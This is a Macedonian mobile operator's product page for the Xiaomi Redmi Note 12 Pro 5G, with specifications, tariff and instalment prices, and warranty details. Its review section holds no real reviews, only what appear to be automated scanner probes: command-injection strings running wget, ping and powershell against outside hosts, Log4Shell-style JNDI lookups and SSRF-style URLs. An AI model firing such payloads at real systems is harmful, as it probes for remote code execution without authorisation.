Мобилна

Xiaomi Redmi Note 12 Pro 5G 6/128

Прочитај повеќе
50+8+2MP rear + 16MP front
6.67" FHD+ Flow AMOLED, 120Hz
5000 mAh
Octa-core
6 GB / 128 GB
Ограничени количини
достапен
онлајн недостапен
50+8+2MP rear + 16MP front
6.67" FHD+ Flow AMOLED, 120Hz
5000 mAh
Octa-core
6 GB / 128 GB
боја: Onyx Black

Достапно во ограничени количини

достапен

онлајн недостапен

Тарифа
A1 Ultra M
Промени тарифа
1.199 ден./мес.
Начин на плаќање
Со еднократен надомест за уред на рати од 199 ден.
Цена на уред

549 ден. x 24 рати

Тарифа: A1 Ultra M
1.199 ден./мес.
Цена

549 ден. x 24 рати

Бесплатна достава

Сакате да знаете кога ќе има залиха?

Ограничени количини
достапен
онлајн недостапен
Одберете тарифа
Враќање на производ
Бесплатна достава
Секогаш во добивка
Безбедно плаќање

Xiaomi Redmi Note 12 Pro 5G 6/128

Цена на уредот во тарифа
Тарифа
Времетраење на договор
Начин на плаќање
Со еднократен надомест за уред на рати од 199 ден.
Основна цена
21.999денари
Припејд
23.999денари
Цена само за уред
23.999денари

Xiaomi Redmi Note 12 Pro 5G 6/128

Што има во кутијата?
  • Xiaomi Redmi Note 12 Pro 5G
  • Адаптер
  • Кабел за полнење
  • Упатство за употреба
  • Гарантен лист
Основни карактеристики
  • 50+8+2MP rear + 16MP front
  • 6.67" FHD+ Flow AMOLED, 120Hz
  • 5000 mAh
  • Octa-core
  • 6 GB / 128 GB
162.9767.9 mm
Детални карактеристики
Мрежа GSM/HSPA/LTE/5G
Тип на SIM Dual Nano SIM
Екран FHD+ Flow AMOLED, 120Hz
Големина на екранот 6.67”
Камера 50+8+2MP
Оперативен систем Android
CPU Octa-core
Вградена меморија 128 GB
RAM меморија 6 GB
Батерија Li-Po 5000 mAh
Македонско мени Yes
Телефонот работи само со А1 SIM картичка No
Предна камера 16MP
Димензии 162.9 × 76 × 7.9 mm
Тежина 187g
Гаранција 24

Xiaomi Redmi Note 12 Pro 5G 6/128

Гаранција и сервис
24
месецигаранција од производител
Овластен сервисер за овој уред

Доколку имате потреба од сервис за Вашиот Xiaomi Redmi Note 12 Pro 5G 6/128, контактирајте го овластениот сервисер.

Xiaomi Redmi Note 12 Pro 5G 6/128

Оценка од корисници

Има вкупно 94 рецензии за овој уред

94
0
0
0
0
5
${jndi:ldap://v3-ping-2943-c4987b50-80f0-4d85-919b-47f4acf22782.securityip.appsechcl.com/foo}
07.02.2024

Дали Ви помогна оваа рецензија?
'wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40319%23
06.02.2024

Дали Ви помогна оваа рецензија?
&& ping -c 1 v3-ping-40308-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
%26%26wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2864
07.02.2024

Дали Ви помогна оваа рецензија?
powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40324
06.02.2024

Дали Ви помогна оваа рецензија?
"powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2902#
07.02.2024

Дали Ви помогна оваа рецензија?
%26wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40305
06.02.2024

Дали Ви помогна оваа рецензија?
|| ping -c 1 v3-ping-2903-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
%5C%22wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2872%23
07.02.2024

Дали Ви помогна оваа рецензија?
%7C%7Cwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2866
07.02.2024

Дали Ви помогна оваа рецензија?
%60wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40309%60
06.02.2024

Дали Ви помогна оваа рецензија?
%7Cwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2857
07.02.2024

Дали Ви помогна оваа рецензија?
v3-ping-3096-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
http://@v3-ping-40639-e024b531-27de-4400-a8f4-16959077bb30.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
&powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40307
06.02.2024

Дали Ви помогна оваа рецензија?
${jndi:ldap://v3-ping-40390-f030e6c0-73dc-4ce6-ab26-23c2848ea8fb.securityip.appsechcl.com/foo}
06.02.2024

Дали Ви помогна оваа рецензија?
'powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40351#
06.02.2024

Дали Ви помогна оваа рецензија?
%3E(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40321)
06.02.2024

Дали Ви помогна оваа рецензија?
$(ping -c 1 v3-ping-2920-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com)
07.02.2024

Дали Ви помогна оваа рецензија?
)(ping -c 1 v3-ping-40376-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com)
06.02.2024

Дали Ви помогна оваа рецензија?
06.02.2024

Дали Ви помогна оваа рецензија?
http://@v3-ping-3098-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
| ping -c 1 v3-ping-2887-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
)(ping -c 1 v3-ping-2924-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com)
07.02.2024

Дали Ви помогна оваа рецензија?
<(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40360)
06.02.2024

Дали Ви помогна оваа рецензија?
${jndi:ldap://v3-ping-2945-c4987b50-80f0-4d85-919b-47f4acf22782.securityip.appsechcl.com/foo}
07.02.2024

Дали Ви помогна оваа рецензија?
)(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2914)
07.02.2024

Дали Ви помогна оваа рецензија?
07.02.2024

Дали Ви помогна оваа рецензија?
|powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40299
06.02.2024

Дали Ви помогна оваа рецензија?
>(ping -c 1 v3-ping-40352-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com)
06.02.2024

Дали Ви помогна оваа рецензија?
v3-ping-40636-e024b531-27de-4400-a8f4-16959077bb30.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
'wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2874%23
07.02.2024

Дали Ви помогна оваа рецензија?
%60wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2861%60
07.02.2024

Дали Ви помогна оваа рецензија?
||powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2894
07.02.2024

Дали Ви помогна оваа рецензија?
%5C%22wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40317%23
06.02.2024

Дали Ви помогна оваа рецензија?
' ping -c 1 v3-ping-2909-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com #
07.02.2024

Дали Ви помогна оваа рецензија?
"powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40343#
06.02.2024

Дали Ви помогна оваа рецензија?
06.02.2024

Дали Ви помогна оваа рецензија?
%3C(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40325)
06.02.2024

Дали Ви помогна оваа рецензија?
|| ping -c 1 v3-ping-40329-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
;powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40330
06.02.2024

Дали Ви помогна оваа рецензија?
<(ping -c 1 v3-ping-2915-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com)
07.02.2024

Дали Ви помогна оваа рецензија?
|powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2853
07.02.2024

Дали Ви помогна оваа рецензија?
%3Bwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2856
07.02.2024

Дали Ви помогна оваа рецензија?
" ping -c 1 v3-ping-40335-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com #
06.02.2024

Дали Ви помогна оваа рецензија?
'powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2905#
07.02.2024

Дали Ви помогна оваа рецензија?
http://0x000A.0x000000.0x002.0x000000F:55229/AppScanMsg.html?varId=40604
06.02.2024

Дали Ви помогна оваа рецензија?
&& ping -c 1 v3-ping-2879-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
&&powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2878
07.02.2024

Дали Ви помогна оваа рецензија?
%3C(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2877)
07.02.2024

Дали Ви помогна оваа рецензија?
%3Bwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40296
06.02.2024

Дали Ви помогна оваа рецензија?
& ping -c 1 v3-ping-2870-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
http://v3-ping-3097-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
; ping -c 1 v3-ping-2896-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
24.12.2023

Дали Ви помогна оваа рецензија?
;powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2890
07.02.2024

Дали Ви помогна оваа рецензија?
22.11.2023

Дали Ви помогна оваа рецензија?
)(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40367)
06.02.2024

Дали Ви помогна оваа рецензија?
%3E(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2875)
07.02.2024

Дали Ви помогна оваа рецензија?
>(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40354)
06.02.2024

Дали Ви помогна оваа рецензија?
06.02.2024

Дали Ви помогна оваа рецензија?
ping -c 1 v3-ping-2863-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
ping -c 1 v3-ping-40303-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
>(ping -c 1 v3-ping-2913-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com)
07.02.2024

Дали Ви помогна оваа рецензија?
" ping -c 1 v3-ping-2907-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com #
07.02.2024

Дали Ви помогна оваа рецензија?
07.02.2024

Дали Ви помогна оваа рецензија?
& ping -c 1 v3-ping-40306-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
>(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2908)
07.02.2024

Дали Ви помогна оваа рецензија?
http://v3-ping-40638-e024b531-27de-4400-a8f4-16959077bb30.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
07.02.2024

Дали Ви помогна оваа рецензија?
&&powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40315
06.02.2024

Дали Ви помогна оваа рецензија?
<(ping -c 1 v3-ping-40362-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com)
06.02.2024

Дали Ви помогна оваа рецензија?
${jndi:ldap://v3-ping-40395-f030e6c0-73dc-4ce6-ab26-23c2848ea8fb.securityip.appsechcl.com/foo}
06.02.2024

Дали Ви помогна оваа рецензија?
&powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2862
07.02.2024

Дали Ви помогна оваа рецензија?
06.02.2024

Дали Ви помогна оваа рецензија?
12.01.2024

Дали Ви помогна оваа рецензија?
%26%26wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40310
06.02.2024

Дали Ви помогна оваа рецензија?
%26wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2859
07.02.2024

Дали Ви помогна оваа рецензија?
; ping -c 1 v3-ping-40320-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
||powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40334
06.02.2024

Дали Ви помогна оваа рецензија?
07.02.2024

Дали Ви помогна оваа рецензија?
' ping -c 1 v3-ping-40342-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com #
06.02.2024

Дали Ви помогна оваа рецензија?
$(ping -c 1 v3-ping-40364-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com)
06.02.2024

Дали Ви помогна оваа рецензија?
%7C%7Cwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40311
06.02.2024

Дали Ви помогна оваа рецензија?
`ping -c 1 v3-ping-2921-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com`
07.02.2024

Дали Ви помогна оваа рецензија?
<(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2910)
07.02.2024

Дали Ви помогна оваа рецензија?
$(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2871)
07.02.2024

Дали Ви помогна оваа рецензија?
%7Cwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40300
06.02.2024

Дали Ви помогна оваа рецензија?
http://0x000A.0x000000.0x002.0x000000F:55229/AppScanMsg.html?varId=3078
07.02.2024

Дали Ви помогна оваа рецензија?
powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2883
07.02.2024

Дали Ви помогна оваа рецензија?
wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40295
06.02.2024

Дали Ви помогна оваа рецензија?
$(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40316)
06.02.2024

Дали Ви помогна оваа рецензија?
`ping -c 1 v3-ping-40370-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com`
06.02.2024

Дали Ви помогна оваа рецензија?
| ping -c 1 v3-ping-40314-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?